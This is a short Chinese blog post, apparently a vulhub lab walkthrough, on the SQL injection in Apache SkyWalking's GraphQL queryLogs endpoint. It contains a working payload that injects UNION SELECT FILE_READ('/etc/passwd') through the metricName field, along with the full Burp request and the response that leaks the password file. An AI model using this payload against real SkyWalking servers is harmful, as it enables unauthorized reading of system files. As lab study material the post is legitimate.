【vluhub】skywalking

已于 2024-08-01 16:27:38 修改
阅读量187 收藏
点赞数 2
分类专栏: 靶场专场 文章标签: skywalking
于 2024-08-01 16:10:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43372364/article/details/140850412
版权

SkyWalking是一个开源监控平台,用于从服务和云原生基础设施收集、分析、聚合和可视化数据

低版本存在sql注入漏洞

访问地址

http://192.168.203.12:8080/graphql

burpsuite抓数据包

替换

{"query":"query queryLogs($condition: LogQueryCondition) {\n    queryLogs(condition: $condition) {\n        logs{\n    content    }\n  }}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--","paging":{"pageNum":1,"pageSize":1},"state":ALL, "queryDuration":{"start":"2021-02-07 1554","end":"2021-02-07 1554","step":"MINUTE"}}}}

POST /graphql HTTP/1.1
Host: 192.168.203.12:8080
Content-Length: 413
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.203.12:8080
Referer: http://192.168.203.12:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"query":"query queryLogs($condition: LogQueryCondition) {\n    queryLogs(condition: $condition) {\n        logs{\n    content    }\n  }}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--","paging":{"pageNum":1,"pageSize":1},"state":ALL, "queryDuration":{"start":"2021-02-07 1554","end":"2021-02-07 1554","step":"MINUTE"}}}}

response

HTTP/1.1 200 
X-Application-Context: application:8080
Date: Thu, 01 Aug 2024 07:51:24 GMT
Content-Type: application/json;charset=utf-8
Content-Length: 1287

{"data":{},"errors":[{"message":"Exception while fetching data (/queryLogs) : Data conversion error converting \"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\"; SQL statement:\nselect count(1) total from (select 1 from INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1-- where  1=1  and time_bucket >= ? and time_bucket <= ? ) [22018-196]"}]}

参考

Apache Skywalking <= 8.3 SQL注入(漏洞分析|snort规则编写)-CSDN博客 

白&黑
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解决 SkyWalking创建profile task任务失败
紫眸的博客
06-16 6508
1. 背景 搭建完成skywalking7.0,其他功能正常。 尝试创建profile task任务,响应数据为空,创建失败。 检查skywalking日志,发现是es写入报错导致的失败。 vim skywalking-oap-server.log 2. 报错分析: 以下是关键信息: Exception while fetching data (/createTask) : Elasticsearch exception [ type=illegal_argument_exception
skywalking
ne_123456的博客
08-23 1675
Skywalking是一个国产的开源框架,2015年有吴晟个人开源,2017年加入Apache孵化器,国人开源的产品,主要开发人员来自于华为,2019年4月17日Apache董事会批准SkyWalking成为顶级项目,支持Java、.Net、NodeJs等探针,数据存储支持Mysql、Elasticsearch等,跟Pinpoint一样采用字节码注入的方式实现代码的无侵入,探针采集数据粒度粗,但性能表现优秀,且对云原生支持,目前增长势头强劲,社区活跃。
graphql-java(5)如何执行请求的?
梦境迷离
04-04 1468
https://dreamylost.cn/ Queries 要对schema执行查询,需要使用适当的参数构建一个新的GraphQL对象,然后调用execute()方法。 查询的结果是ExecutionResult,它可能包含查询数据或错误信息列表。 GraphQLSchema schema = GraphQLSchema.newSchema() .query(queryType)...
skywalking-demo
08-20
SkyWalking 是一个强大的应用性能监控(APM)系统,尤其针对微服务和云原生架构。这个名为 "skywalking-demo" 的压缩包很可能是为了帮助用户了解和学习 SkyWalking 的基本功能和用法。以下是对 SkyWalking 及其在...
Skywalking仪表盘使用
06-07
Skywalking是一款开源的应用性能监控(APM)系统,主要用于分布式系统的微服务监控,它能够帮助开发者追踪服务调用链路,分析系统瓶颈,提供实时性能指标。本篇将详细讲解如何使用Skywalking的仪表盘来有效地监控和...
skywalking-apm+skywalking-java-agent
04-26
SkyWalking适用于分布式系统的应用程序性能监控工具,专为微服务、云原生和基于容器 (Kubernetes) 的架构而设计。 SkyWalking在8.8.0版本以后将agent进行了单独拆分,因此若要使用8.8.0版本以后的,需要下载apm和...
skywalking 8.7 安装包,包括agent,skywalking-webapp.jar
05-24
Apache SkyWalking 是一款开源的应用性能监控(APM)系统,尤其专注于微服务、云原生架构的监控。它能够帮助开发者和运维人员诊断分布式系统的性能问题,提供服务追踪、度量分析、告警以及可视化的能力。这个8.7版本...
centos apache-skywalking-apm-9.7.0.tar 安装包
05-06
Apache SkyWalking 是一款开源的应用性能监控(APM)系统,主要针对微服务、云原生架构的监控和诊断。此安装包"centos apache-skywalking-apm-9.7.0.tar"是专为 CentOS 操作系统设计的,包含了 Apache SkyWalking 的...
APO与SkyWalking、Signoz等产品的不同设计
kindlingx的博客
09-06 661
Skywalking作为国内用户量最大的APM产品,有着众多的优点。Signoz作为OpenTelemetry的发行版也有着一定的名气。我们为什么还要设计APO项目?谨代表APO团队探讨下团队之前的经验,一家之言,欢迎各位大佬一起探讨。
使用Docker安装 Skywalking(单机版)
杨川云的博客
09-10 467
Skywalking官网分布式系统的应用程序性能监视工具,专为微服务、云原生架构和基于容器(Docker、K8s、Mesos)架构而设计。提供分布式追踪、服务网格遥测分析、度量聚合和可视化一体化解决方案。Skywalking 整体架构Skywalking 单机环境功能流程。
餐厅点餐系统springboot.zip
09-10
开发一个基于Spring Boot的餐厅点餐系统可以大大提高餐厅的服务效率和顾客体验。下面是一个简单的案例程序,展示了如何使用Spring Boot来构建这样一个系统。这个系统将包括用户管理、菜单管理、订单管理等基本功能。 1. 创建项目 首先,通过Spring Initializr(https://start.spring.io/)创建一个新的Spring Boot项目,并添加必要的依赖项,如Web、Thymeleaf、Spring Data JPA 和 MySQL Driver。
MATLAB_SIMULINK中的病毒传播模拟器.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
Sigrity-Sigrity MCP Specification.rar
最新发布
09-10
Sigrity-Sigrity MCP Specification.rar 当引脚名称映射失败时,通过坐标映射为替代引脚映射方法添加可选的引脚坐标(相对于元件原点)。 本文档描述了信号模型连接协议(MCP)。 MCP用于在管芯(芯片)、封装和PCB之间连接电路模型和/或物理布局。 MCP允许任何MCP型号的Sigrity产品内的自动模型和结构连接。 它还允许第三方工具将Sigrity模型与MCP集成或连接。 MCP使用简单的ASCII格式,支持模型连接的多个电路和引脚,并允许将物理引脚集中在电路模型中。 MCP具有可扩展性和向后兼容性。
智能优化算法-樽海鞘优化算法(SSA)
09-10
樽海鞘优化算法 (Salp Swarm Algorithm, SSA) 虽然名称中提到的是“樽海鞘”,但实际上这个算法是基于群体智能的一种元启发式优化算法,它模拟了樽海鞘(Salps)在海洋中的游动和觅食行为,用于解决复杂的优化问题。 SSA的工作机制主要包括以下几个方面: 链式游动:模拟樽海鞘在海洋中形成链状结构进行集体游动,用于探索解空间。 觅食行为:通过模拟樽海鞘的觅食行为,促进算法的局部搜索能力。 动态调整:根据当前搜索状态动态调整搜索策略,平衡全局搜索和局部搜索。 优点包括: 强大的探索能力:SSA能够有效地探索解空间的不同区域。 灵活性:适用于多种优化问题,包括连续和离散优化。 快速收敛:通常能够在较少迭代次数内找到较好的解。 易于实现:算法设计直观,易于编程实现。
CNG油改气 150+155+2.0+调试软件
09-10
CNG油改气 150+155+2.0+调试软件
为什么消费者喜欢生成式人工智能(英)(1).pdf
09-10
为什么消费者喜欢生成式人工智能(英)(1).pdf
Apache Skywalking安装与配置指南
"Skywalking是一款开源的应用性能监控系统(APM, Application Performance Monitoring),主要关注微服务、容器化环境的分布式跟踪和监控。本教程将引导你了解如何下载、配置并使用Skywalking。" Skywalking 是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值